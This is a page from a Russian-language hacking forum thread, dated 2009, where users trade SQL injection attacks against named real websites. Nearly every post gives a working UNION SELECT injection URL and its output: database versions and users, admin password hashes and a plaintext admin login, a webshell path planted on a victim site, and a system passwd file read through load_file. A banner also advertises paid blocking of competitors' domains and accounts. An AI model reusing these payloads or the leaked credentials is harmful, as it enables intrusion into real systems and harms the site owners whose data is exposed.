Форум АНТИЧАТ - SQL Инъекции

ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 782 из 1239

782

Опции темы

Поиск в этой теме

Опции просмотра

22.02.2009, 02:37

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

Page Rank 5 www.bioenergetic.hu
Какой то вебшоп самопальный

PHP код:


		
			
http://www.bioenergetic.hu/index.php?module=webshop&target=view&id=93+union+select+1,concat_ws(0x3A,name,password),3,4+from+bioenergetic.tps_user+limit+0,1+--+

admin:217a968c3f6a1d9d9cf8784d1c83ca43 - admin:tibor

админка какая то стремная но шелл наверно можно подлить:

http://www.bioenergetic.hu/admin.php

PR -6 www.streetchildren.org.uk, я как database() увидел аш крякнул

PHP код:


		
			
http://www.streetchildren.org.uk/resources/details/?type=theme&Reg%3Cbr%20/%3Eion=&country=&key_theme=&theme=-125+union+select+1,2,concat_ws(0x3A,user,password,host,file_priv),4,5,6,7,8+from+mysql.user+--+&other=&publication=

Последний раз редактировалось AkyHa_MaTaTa; 22.02.2009 в 03:19..

22.02.2009, 03:06

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

2 AkyHa_MaTaTa

http://www.bioenergetic.hu/images/webshop/ezoterikus_termekek_ekszerek_egyeb/webshell.php

http://www.valera.ro/catalog.php?pid=-40+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8

Database Version: 5.0.32-Debian_7etch8-log
Database name: valera
User name: valera@localhost

22.02.2009, 03:11

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

Отправить сообщение для Assembler с помощью ICQ

http://www.sales-akzent.ru/index2.php?s=42%20union%20select%201,2,version()--

4.1.22

Код:

http://www.kklife.kz

PR: 4
Òèö: 20
Версия: 5.0.67-community
БазаДанных: kklifek_kkl
Пользователь: kklifek_kkl@localhost

Код:

http://www.kklife.kz/text.php?top=5&left=-1%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x666f72756d5f7573657273--

Админка: http://www.kklife.kz/admin.php

Последний раз редактировалось Assembler; 22.02.2009 в 04:02..

scotland.org.ua

22.02.2009, 09:31

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

scotland.org.ua

Код:

http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5

version(): 5.0.67-community
database(): qwertyadm1_scOtL
user(): qwertyadm1_rma6l@localhost

Код:

http://scotland.org.ua/admin/

login: admin
passwd: paLz5C9qm1

22.02.2009, 10:25

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.extream.ro/index.php?categorie=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10--

Version : 5.0.51b
Database : forum_test
User : root@localhost

22.02.2009, 12:24

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

http://1.chudovo.peterhost.ru/tex.php?id=-127%20union%20select%20version()%20--

4.1.22-log

22.02.2009, 12:42

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

Провел на форуме:
3020589

Репутация: 240

http://tariffs.lbl.gov/utility/utility.php?util_id=1256%27+union+select+1,version (),3,4,5,6,7,8,9,10,11+limit+1,1/*

Version : 5.0.45
Database : TARIFF
User : PAHARRIS@MINOTAUR.LBL.GOV

http://www.aer.mil.br/portal/capa/index.php?mostra=1436+union+select+1,2,3,version() ,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*

Version : 5.0.32-Debian_7etch8-log
Database : dbenoticias
User : cecomsaer@172.16.1.117

Последний раз редактировалось M.W.N.N.; 22.02.2009 в 13:53..

22.02.2009, 13:33

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Не люблю фирму SAGEM

Цитата:

http://www.sagem.com/mobiles/index.php?id=11&news_id=-67/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11/*&news_cat=05

Database Version: 4.0.24_Debian-10sarge1-log
Database name: scm_mobiles
User name: scm_mobiles_adm@localhost

22.02.2009, 13:48

[JavaScript]

Познающий

Регистрация: 14.02.2009

Сообщений: 45

Провел на форуме:
96296

Репутация: 74

Код:

http://www.smartdokis.palsoftweblink.com/mynews.php?newsID=-2+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5

user():database():version()
palsoftw_root@localhostalsoftw_smartdoc:5.0.67-community-log

#10

22.02.2009, 14:21

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13

Database Version: 4.1.22-log
Database name: sql_applestore_mg
User name: sqladmin@ns.macgallery.ro

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,load_file(0x2F6574632F70617373 7764),3,4,5,6,7,8,9,10,11,12,13

## # User Database # # Note that this file is consulted when the system is running in single-user # mode. At other times this information is handled by one or more of: # lookupd DirectoryServices # By default, lookupd gets information from NetInfo, so this file will # not be consulted unless you have changed lookupd's configuration. # This file is used while in single user mode. # # To use this file for normal authentication, you may enable it with # /Applications/Utilities/Directory Access. ## nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false cyrusimap:*:77:6:Cyrus IMAP User:/var/imap:/usr/bin/false mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false appserver:*:79:79:Application Server:/var/empty:/usr/bin/false clamav:*:82:82:Clamav User:/var/virusmails:/bin/tcsh amavisd:*:83:83:Amavisd User:/var/virusmails:/bin/tcsh jabber:*:84:84:Jabber User:/var/empty:/usr/bin/false xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9,10,11,12,13+from+mysql.user

sqladmin: *29C30F3228837BB0384A9F3DC58FF79173D5F952

Страница 782 из 1239

782

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ